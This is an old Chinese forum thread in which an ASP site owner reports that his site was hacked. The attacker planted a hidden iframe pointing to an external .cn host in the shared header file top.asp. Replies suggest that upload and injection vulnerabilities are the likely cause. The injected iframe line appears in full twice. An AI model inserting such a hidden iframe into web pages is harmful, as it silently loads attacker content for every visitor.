我网站的asp程序被黑了!

xiaodu 2008-11-23 02:03:22
我用网上的asp产品管理程序,在这几天被人给黑了。
好像他能进入我的后台,我访问网站的时候就是一个空白页面,里面什么都没有了。
在index.asp中我有如下代码:
<!-- #include file="top.asp" -->
这个top.asp中是我这个产品发布系统中的每个页面表头,即公司的logo等,这个top.asp在每个asp文件都出现。
当我用ftp把损坏的页面下载后分析时,发现在top.asp中<html>...</html>后,有一段:
<iframe src=http://www.hryspan.cn/one/a26.htm width=50 height=0 border=0></iframe>
是不是他看到了每个页面都有这个top.asp,然后就在里面加了这个东西,大家帮我看看这是个什么东西,其什么作用。那我应该怎样解决这个困难啊,他怎么会看到我的这个top.asp并加了代码呢,我怎样做才能防止类似问题的出现啊,高手帮帮我啊!
...全文
84 4 打赏 收藏 转发到动态 举报
AI 作业
写回复
用AI写文章
4 条回复
切换为时间正序
请发表友善的回复…
发表回复
gmlwl 2008-11-24
  • 打赏
  • 举报
回复
你的程序最大的可能就是有上传漏洞
次之,就是有注入漏洞

把这些堵上就可以了.
如果不是很麻烦的话,我帮你看看
QQ:27699111
如果程序很大,你还是另请高明呵.我时间不是很多.
virgo2008 2008-11-23
  • 打赏
  • 举报
回复
就是增加权限,对上传的东西要严格的控制,还有一种就是注入,你没有过滤掉关键字
xiaodu 2008-11-23
  • 打赏
  • 举报
回复
说具体点啊,我用的是时代互联的空间,用ftp工具上传,网站有管理后台,你说的后门是指什么啊,怎么避免啊
virgo2008 2008-11-23
  • 打赏
  • 举报
回复
被黑了,被人加了<iframe src=http://www.hryspan.cn/one/a26.htm width=50 height=0 border=0> </iframe>
主要看你的程序是不是有后门,一般是上传的漏洞

28,409

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧